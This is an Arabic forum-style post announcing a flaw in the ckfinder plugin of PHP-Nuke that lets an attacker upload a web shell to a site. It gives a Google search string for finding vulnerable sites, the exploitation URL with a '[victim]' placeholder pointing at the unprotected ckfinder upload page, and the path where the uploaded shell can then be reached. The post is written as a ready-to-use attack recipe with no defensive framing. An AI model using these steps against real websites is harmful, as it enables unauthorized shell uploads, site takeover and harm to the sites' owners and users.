ثغرة في سكربت PHPnuke نوع الثغرة (تمكنك من رفع شل على الموقع )


ثغرة في سكربت PHPnuke نوع الثغرة (تمكنك من رفع شل على الموقع )

رابط السكربت :
PHP-Nuke

الإضافة المصابة:
ckfinder

البحث في جوجل :
Project By PHPNuke.ir

الإستغلال:
كود:
كود:
Http://[victim]/path-to-nuke//includes/ckfinder/ckfinder.html
عند رفع الشل تجده على الرابط التالي:
كود:
كود:
/includes/ckfinder/files/Filename ]
أسم الشل =filename